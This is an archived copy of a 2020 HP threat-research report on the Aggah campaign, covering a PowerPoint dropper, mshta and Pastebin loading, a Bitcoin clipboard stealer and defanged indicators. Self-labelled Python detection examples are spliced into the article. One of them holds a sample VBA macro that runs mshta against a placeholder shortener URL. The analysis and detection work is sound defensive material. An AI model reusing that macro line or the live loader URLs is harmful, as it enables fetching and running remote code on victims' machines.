{
	"id": "2faa6242-cb57-4773-bd36-b90aaae3b6b5",
	"created_at": "2026-04-06T00:12:36.410853Z",
	"updated_at": "2026-04-10T13:12:43.384304Z",
	"deleted_at": null,
	"sha1_hash": "1db17a44207946c9b5c54fd1b31fcdd141ecc8ab",
	"title": "Aggah Campaign’s Latest Tactics: Victimology, PowerPoint Dropper and Cryptocurrency Stealer",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1111350,
	"plain_text": "Aggah Campaign’s Latest Tactics: Victimology, PowerPoint Dropper and\r\nCryptocurrency Stealer\r\nBy Alex Holland\r\nPublished: 2020-07-01 · Archived: 2026-04-05 23:18:21 UTC\r\nA notable PowerPoint malicious spam campaign we investigated recently was detected by HP Sure Click in May 2020. Its\r\ntactics, techniques and procedures (TTPs) suggest that the activity is linked to threat actors behind a string of similar\r\ncampaigns, known collectively as the Aggah campaign.  In this campaign, malicious PowerPoint Add-in files were used to\r\ndeliver Agent Tesla and PowerShell cryptocurrency-stealing malware.\r\nThe use of PowerPoint malware is significant because it’s uncommon. Of the office document malware isolated by HP Sure\r\nClick in 2020 so far, only 1% was PowerPoint malware (Figure 1). Most (65%) of the office document malware seen in the\r\nwild uses Microsoft Word file formats, such as DOC, DOCX and DOCM, followed by Excel formats.\r\nAlthough aspects of the May 2020 Aggah campaign have been analysed elsewhere, information about the attacker’s email\r\ninfrastructure and campaign victimology is difficult to find. HP Sure Click telemetry suggests that the sectors and countries\r\ntargeted by the threat actor behind this latest campaign are broader than previously thought. We also analysed the differences\r\nfrom previous Aggah campaigns. The most significant alterations found were the use of a PowerPoint-based dropper instead\r\nof Word- or Excel-based droppers, and the new inclusion of a PowerShell Bitcoin stealer.\r\nFigure 1 – Proportion of office document threats by type, based on HP Sure Click telemetry.\r\nTargeting and Victimology\r\nHP Sure Click isolated PowerPoint presentations tied to the May 2020 Aggah campaign that were named according to the\r\nregular expressions below. 
All the files shared the same hash value (SHA-256\r\n7eafb57e7fc301fabb0ce3b98092860aaac47b7118804bb8d84ddb89b9ee38f3).\r\nMoglix Purchase Order \\d{6}\\.(pps|ppt)\r\nPO – \\d{6}\\.(pps|ppt)\r\nBank details\\.ppt\r\nPayment Details\\.pps\r\nNew order GLT srl_\\d{7}_\\d{2}\\.\\d{2}\\.\\d{4}\\.ppt\r\nScan emco Bautechni specifications\\.pps\r\nhttps://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/\r\nPage 1 of 6\r\nFigure 2 – Some of the detected samples shown in HP Sure Controller.\r\nAn analysis of the organisations that were targeted by the campaign shows that the targets belonged to six sectors, the most\r\ncommon being manufacturing. From HP Sure Click telemetry, the targets were located in eight countries, predominantly in\r\nEurope (Figure 3).\r\nFigure 3 – Observed Aggah campaign infrastructure and targets in May 2020.\r\nTo make the phishing emails look more legitimate, the attacker spoofed the domains of five business-to-business (B2B)\r\ncompanies in the same or a related industry as the targets. The industries and locations of the spoofed organisations indicate\r\nthat the attacker likely sought to target businesses instead of individuals across many sectors. The organisations that were\r\nimpersonated are based in the following countries, indicating a large geographic spread:\r\nFrance\r\nGermany\r\nUnited Arab Emirates\r\nIndia\r\nSome of the recipient mail servers reported that the emails failed Sender Policy Framework (SPF) validation, meaning the\r\nsending servers were not authorised to send mail for the domains in the Return-Path field, i.e. those domains were spoofed.\r\nHowever, in several cases the emails were still delivered to employees’ mailboxes, which suggests that some of the target\r\norganisations had not implemented a policy of rejecting mail if it failed an SPF check. 
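The following is an added example, not code from the HP article or from HP Sure Click: the gateway-side check that the two observations above call for. It parses the SPF verdict the receiving mail server recorded in the Authentication-Results header, matches attachment names against the campaign file-name patterns listed above (rewritten without backslash escapes), and returns a triage action. The e-mail below is constructed for the example and its domain names are placeholders.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Attachment-name patterns reported for the May 2020 campaign (taken from the
# article, rewritten with [0-9] and [.] instead of backslash escapes).
LURE_NAME_PATTERNS = [
    r'Moglix Purchase Order [0-9]{6}[.](pps|ppt)',
    r'PO – [0-9]{6}[.](pps|ppt)',
    r'Bank details[.]ppt',
    r'Payment Details[.]pps',
    r'New order GLT srl_[0-9]{7}_[0-9]{2}[.][0-9]{2}[.][0-9]{4}[.]ppt',
    r'Scan emco Bautechni specifications[.]pps',
]

SPF_RESULT = re.compile(r'spf=(pass|fail|softfail|neutral|none|temperror|permerror)', re.I)


def is_lure_name(filename):
    '''True when an attachment name matches one of the campaign patterns.'''
    return any(re.fullmatch(p, filename, re.I) for p in LURE_NAME_PATTERNS)


def spf_result(msg):
    '''SPF verdict recorded by the receiving MX in Authentication-Results.'''
    for value in msg.get_all('Authentication-Results', []):
        m = SPF_RESULT.search(value)
        if m:
            return m.group(1).lower()
    return 'none'


def return_path_domain(msg):
    '''Domain of the envelope sender, which is what SPF was evaluated against.'''
    addr = parseaddr(msg.get('Return-Path', ''))[1]
    return addr.rpartition('@')[2].lower()


def attachment_names(msg):
    '''Attachment file names from Content-Disposition, falling back to Content-Type name.'''
    names = []
    for part in msg.walk():
        name = part.get_filename() or part.get_param('name')
        if name:
            names.append(name)
    return names


def triage(raw_message):
    '''Return (action, reasons). A hard SPF fail on the envelope domain is rejected,
    a softfail or a lure-pattern attachment is quarantined, anything else delivered.'''
    msg = message_from_string(raw_message)
    reasons = []
    spf = spf_result(msg)
    if spf in ('fail', 'softfail'):
        reasons.append('SPF ' + spf + ' for envelope domain ' + return_path_domain(msg))
    for name in attachment_names(msg):
        if is_lure_name(name):
            reasons.append('attachment name matches campaign lure: ' + name)
    if spf == 'fail':
        return 'reject', reasons
    if reasons:
        return 'quarantine', reasons
    return 'deliver', reasons


# Constructed sample: a spoofed supplier domain that fails SPF and carries a lure.
SAMPLE_PHISH = '''Return-Path: <orders@supplier-spoofed.example>
Authentication-Results: mx.target.example; spf=fail (sender IP is 192.0.2.10) smtp.mailfrom=supplier-spoofed.example
From: Purchasing <orders@supplier-spoofed.example>
To: sales@target.example
Subject: Purchase Order 483921
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary=b1

--b1
Content-Type: text/plain

Please find the attached purchase order.
--b1
Content-Type: application/vnd.ms-powerpoint; name=po.pps
Content-Disposition: attachment; filename=Moglix Purchase Order 483921.pps
Content-Transfer-Encoding: base64

AAAA
--b1--
'''

if __name__ == '__main__':
    print(triage(SAMPLE_PHISH))
```

Rejecting on a hard SPF fail is the policy the article notes some recipients lacked. In production the same decision is usually driven by the spoofed domain's DMARC policy rather than by SPF alone, because legitimate forwarding also breaks SPF; that is why softfail and neutral results only reach the quarantine path here.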
We observed emails being sent from the following mail servers:\r\nhwsrv-721609.hostwindsdns[.]com (192.119.91[.]236)\r\nhwsrv-722288.hostwindsdns[.]com (192.119.106[.]136)\r\n172.241.27[.]218\r\n172.93.201[.]103\r\n172.93.201[.]113\r\nPowerPoint Dropper – Using Errors to Run Malware\r\nThe dropper used in this campaign was noteworthy because its execution relied on intentionally triggering a PowerPoint\r\napplication error when the presentation was opened. The error caused PowerPoint to close the presentation, generating an\r\nAuto_Close event that was used to run a malicious Visual Basic for Applications (VBA) macro.\r\nTo achieve this, the dropper was implemented as a PowerPoint 97-2003 Add-in (.PPA) that had been renamed to use .PPS\r\n(PowerPoint 97-2003 Slide Show) or .PPT (PowerPoint 97-2003 Presentation) file extensions. The advantage of using the\r\nPPA format is that, unlike other PowerPoint formats, Auto_Open and Auto_Close VBA subroutines are available, meaning an\r\nattacker can trigger the execution of a malicious macro when a user opens or closes the presentation.\r\nIn this case, when the presentation is closed, a subroutine called “Page” is executed (Figure 4).\r\nFigure 4 – Auto_Close and “Page” subroutines.\r\nWhen opened, PowerPoint raises an error saying that the file cannot be read (Figure 5). Clicking the OK or Close button\r\ncloses the presentation, causing the macro to run in the background before PowerPoint exits. Using this error as the way of\r\nrunning the macro was likely deliberate, since the presentation contains no decoy content: the error dialog is the only thing\r\nthe user sees, and dismissing it is what runs the macro.\r\nFigure 5 – Error raised by PowerPoint when opening the dropper.\r\nThe VBA code used to download the next stage of malware is implemented in the “Page” subroutine (Figure 6). 
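As an added example (not code from the article or from HP), here is a macro-source triage check for the dropper pattern described in this section: an Auto_Open or Auto_Close handler that hands off to a second subroutine, a WScript.Shell object whose Run method launches mshta with a remote URL (the hand-off the article details next), and a URL on a shortener or paste site. The VBA sample is constructed to mirror that behaviour; its URL is a placeholder path rather than the campaign's, and the indicator weights are illustrative choices.

```python
import re

DQ = chr(34)  # double quote character, built with chr() so the literals below stay quote-free

# Weighted indicators over extracted VBA source. Each regex avoids backslash
# escapes; weights are illustrative, not calibrated.
INDICATORS = {
    'auto_handler':       (r'(?im)^[ ]*(private[ ]+|public[ ]+)?sub[ ]+auto_(open|close)[ ]*[(]', 2),
    'wscript_shell':      (r'(?i)wscript[.]shell', 2),
    'run_method':         (r'(?i)[.]run[ (]', 1),
    'lolbin':             (r'(?i)(mshta|regsvr32|rundll32|certutil|powershell)([.]exe)?(?![a-z0-9_])', 3),
    'remote_url':         (r'(?i)https?://[a-z0-9._/-]+', 2),
    'shortener_or_paste': (r'(?i)https?://(j[.]mp|bit[.]ly|pastebin[.]com)/', 2),
}

# Sub <name>(<params>) ... End Sub, case-insensitive, body captured lazily.
SUB_DEF = re.compile(r'(?is)(?<![a-z0-9_])sub[ ]+([a-z_][a-z0-9_]*)[ ]*[(][^)]*[)](.*?)end[ ]+sub')


def handler_handoff(src):
    '''Names of other subs invoked from an Auto_Open/Auto_Close body. The handler
    itself is often a one-line call, so the network code lives elsewhere.'''
    subs = {m.group(1): m.group(2) for m in SUB_DEF.finditer(src)}
    calls = []
    for handler, body in subs.items():
        if handler.lower() not in ('auto_open', 'auto_close'):
            continue
        for other in subs:
            if other != handler and re.search('(?i)(?<![a-z0-9_])' + other + '(?![a-z0-9_])', body):
                calls.append(other)
    return calls


def scan_vba(src):
    '''Return (score, hits); hits maps each indicator name to the text it matched.'''
    score = 0
    hits = {}
    for name, (pattern, weight) in INDICATORS.items():
        m = re.search(pattern, src)
        if m:
            hits[name] = m.group(0)
            score += weight
    handoff = handler_handoff(src)
    if handoff:
        hits['handler_calls_sub'] = handoff
        score += 1
    return score, hits


# Constructed VBA mirroring the described dropper: Auto_Close calls Page, which
# launches mshta against a shortener URL (placeholder path, not the real one).
SAMPLE_VBA = f'''Sub Auto_Close()
    Page
End Sub

Sub Page()
    Dim sh As Object
    Set sh = CreateObject({DQ}WScript.Shell{DQ})
    sh.Run {DQ}mshta http://j.mp/placeholder{DQ}, 0
End Sub
'''

if __name__ == '__main__':
    print(scan_vba(SAMPLE_VBA))
```

In practice the source text comes from an extractor such as olevba. The hand-off check is the part worth keeping: the Auto_Close body here is a bare subroutine name and contains nothing suspicious on its own, so a rule that only inspects the handler misses the mshta call.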
The\r\nsubroutine is minimally obfuscated and does not contain any sandbox detection. When run, it creates a WScript.Shell object\r\nand then uses the Run method to execute a remotely hosted VBScript loader using Mshta (T1170). Mshta.exe is a signed\r\nMicrosoft utility that runs HTML Applications, and with them script written in interpreted languages such as VBScript and\r\nJScript, which makes it a convenient proxy for executing remotely hosted script. The VBScript was hosted on Pastebin\r\n(hxxps://pastebin[.]com/raw/Bnv7ruYp) and accessed via a URL redirect (hxxp://j[.]mp/dmdmcrcrcryctcgufyguhmd) that\r\nwas created using the j[.]mp URL shortening service.\r\nFigure 6 – “Page” subroutine that uses Mshta to run VBScript hosted on Pastebin.\r\nCryptocurrency Stealer – BitcoinClipboardMalware\r\nA new addition to the Aggah campaign is the inclusion of a cryptocurrency stealer. This is implemented in a PowerShell\r\nscript that is downloaded and run after the target computer has been compromised (Figure 7). The script monitors the\r\nvictim’s clipboard for Bitcoin addresses and replaces them with the attacker’s address in the hope that the victim\r\ninadvertently transfers Bitcoin to the attacker. The script was possibly copied from a deleted GitHub project called\r\nBitcoinClipboardMalware, which matches the script used in the campaign (Figure 7). In this case, the attacker’s address was\r\n19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W.\r\nFigure 7 – Deobfuscated Bitcoin stealer PowerShell script.\r\nOn 18 May, 0.00311321 Bitcoin was transferred into the attacker’s address, possibly from a victim. Fortunately, the amount\r\ntransferred was small, worth approximately $28 USD. Since Bitcoin transactions are public, it is possible to trace this\r\ntransaction back to a cryptocurrency exchange. 
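Added example, not code from the article: a base58check validator for the legacy addresses this clipboard stealer swaps in, and a hop-by-hop trace over a constructed ledger that records the three transfers the article describes (the 18 May deposit and the two onward moves it goes on to detail), following funds from the attacker's address until an address labelled as belonging to an exchange is reached. The addresses and the deposit amount are the ones the article reports; the ledger structure, the amounts of the two onward transfers and the exchange-label lookup are constructed for the example, and the depositor is left as None because the article does not identify it.

```python
import hashlib

B58_ALPHABET = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'


def b58decode(text):
    '''Decode base58 text to bytes; each leading 1 stands for a zero byte.'''
    number = 0
    for ch in text:
        index = B58_ALPHABET.find(ch)
        if index < 0:
            raise ValueError('not a base58 character: ' + ch)
        number = number * 58 + index
    body = number.to_bytes((number.bit_length() + 7) // 8, 'big')
    pad = len(text) - len(text.lstrip('1'))
    return bytes(pad) + body


def is_valid_legacy_address(addr):
    '''base58check validation for mainnet P2PKH (version 0) and P2SH (version 5):
    21-byte payload followed by the first 4 bytes of double SHA-256.'''
    try:
        raw = b58decode(addr)
    except ValueError:
        return False
    if len(raw) != 25 or raw[0] not in (0, 5):
        return False
    digest = hashlib.sha256(hashlib.sha256(raw[:21]).digest()).digest()
    return digest[:4] == raw[21:]


# Constructed ledger of (date, source, destination, btc). Only the addresses and
# the 18 May amount come from the article; the onward amounts are illustrative
# and None marks the depositor the article does not identify.
LEDGER = [
    ('2020-05-18', None, '19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W', 0.00311321),
    ('2020-06-16', '19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W', '1PGRpP14sSBER6x2choH31wkML1hXqykNj', 0.0031),
    ('2020-06-17', '1PGRpP14sSBER6x2choH31wkML1hXqykNj', '1NDyJtNTjmwk5xPNhjgAMu4HDHigtobu1s', 0.0030),
]

# Attribution lookup; the article associates this address with Binance.
EXCHANGE_LABELS = {'1NDyJtNTjmwk5xPNhjgAMu4HDHigtobu1s': 'Binance'}


def malformed_addresses(ledger):
    '''Addresses in the ledger that fail base58check (typos, wrong network).'''
    seen = {a for entry in ledger for a in entry[1:3] if a is not None}
    return sorted(a for a in seen if not is_valid_legacy_address(a))


def trace_to_exchange(start, ledger=LEDGER, labels=EXCHANGE_LABELS, max_hops=10):
    '''Follow outgoing transfers from start, earliest first, until a labelled
    exchange address is reached. Returns (path, label); label is None when the
    funds go cold or max_hops is exhausted first.'''
    outgoing = {}
    for date, src, dst, amount in sorted(ledger, key=lambda e: e[0]):
        if src is not None:
            outgoing.setdefault(src, []).append(dst)
    path, current = [start], start
    while current not in labels and len(path) <= max_hops:
        unseen = [dst for dst in outgoing.get(current, []) if dst not in path]
        if not unseen:
            return path, None
        current = unseen[0]
        path.append(current)
    return path, labels.get(current)


if __name__ == '__main__':
    print('malformed:', malformed_addresses(LEDGER))
    print(trace_to_exchange('19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W'))
```

The checksum test is what a wallet should apply on paste, but note its limit against this stealer: the attacker's address is itself a valid one, so only comparing the pasted address with the one the user meant to copy catches the swap. The trace follows a single outgoing edge per hop, which is enough for the linear chain in the article; real investigations fan out over every output and need a block explorer feed in place of the constructed ledger.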
On 16 June, the balance in the attacker’s wallet was transferred to another\r\nBitcoin address (1PGRpP14sSBER6x2choH31wkML1hXqykNj), likely an intermediary wallet (Figure 8).\r\nFigure 8 – Transfer of the Bitcoin from the attacker’s wallet to an intermediary address.\r\nOn 17 June, the balance was transferred to a Bitcoin address associated with Binance\r\n(1NDyJtNTjmwk5xPNhjgAMu4HDHigtobu1s), a cryptocurrency exchange that allows users to buy and sell\r\ncryptocurrencies (Figure 9).\r\nFigure 9 – Transaction showing a transfer of Bitcoin to an address associated with Binance.\r\nConclusion\r\nSince first being documented in 2019, Aggah has undergone several changes while still maintaining some consistent TTPs,\r\nsuch as a preference for hosting scripts and payloads on Pastebin, obfuscating URLs using URL shortening services, and\r\nusing Mshta.exe for code execution. The move to a PowerPoint dropper and the inclusion of a Bitcoin stealer are another\r\nevolution of Aggah. In this latest campaign, the attacker chose to impersonate B2B companies in Europe, the Middle East\r\nand Asia, which suggests they did not intend to compromise organisations in a specific region. 
The sectors and locations of\r\nthe victims also indicate that the attacker sought to compromise businesses in a variety of industries, from manufacturing to\r\nagriculture.\r\nIndicators of Compromise\r\nIndicator | SHA-256 Hash | Purpose\r\nPowerPoint attachment (PPS and PPT file extensions) | 7eafb57e7fc301fabb0ce3b98092860aaac47b7118804bb8d84ddb89b9ee38f3 | Dropper\r\nhxxp://j[.]mp/dmdmcrcrcryctcgufyguhmd | - | URL redirect leading to VBScript loader\r\nhxxps://pastebin[.]com/raw/Bnv7ruYp | - | VBScript loader\r\n19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W | - | Aggah Bitcoin address\r\nhwsrv-721609.hostwindsdns[.]com (192.119.91[.]236) | - | Aggah mail server\r\nhwsrv-722288.hostwindsdns[.]com (192.119.106[.]136) | - | Aggah mail server\r\n172.241.27[.]218 | - | Aggah mail server\r\n172.93.201[.]103 | - | Aggah mail server\r\n172.93.201[.]113 | - | Aggah mail server\r\nSource: https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/"
	],
	"report_names": [
		"aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer"
	],
	"threat_actors": [
		{
			"id": "b0d34dd6-ee90-483b-bb6c-441332274160",
			"created_at": "2022-10-25T16:07:23.296754Z",
			"updated_at": "2026-04-10T02:00:04.526403Z",
			"deleted_at": null,
			"main_name": "Aggah",
			"aliases": [
				"Operation Red Deer",
				"Operation Roma225"
			],
			"source_name": "ETDA:Aggah",
			"tools": [
				"AgenTesla",
				"Agent Tesla",
				"AgentTesla",
				"Aggah",
				"Atros2.CKPN",
				"Bladabindi",
				"Jorik",
				"Nancrat",
				"NanoCore",
				"NanoCore RAT",
				"Negasteal",
				"Origin Logger",
				"Revenge RAT",
				"RevengeRAT",
				"Revetrat",
				"Warzone",
				"Warzone RAT",
				"ZPAQ",
				"Zurten",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "28851008-77b4-47eb-abcd-1bb5b3f19fc2",
			"created_at": "2023-06-20T02:02:10.254614Z",
			"updated_at": "2026-04-10T02:00:03.365336Z",
			"deleted_at": null,
			"main_name": "Hagga",
			"aliases": [
				"TH-157",
				"Aggah"
			],
			"source_name": "MISPGALAXY:Hagga",
			"tools": [
				"Agent Tesla"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434356,
	"ts_updated_at": 1775826763,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1db17a44207946c9b5c54fd1b31fcdd141ecc8ab.pdf",
		"text": "https://archive.orkl.eu/1db17a44207946c9b5c54fd1b31fcdd141ecc8ab.txt",
		"img": "https://archive.orkl.eu/1db17a44207946c9b5c54fd1b31fcdd141ecc8ab.jpg"
	}
}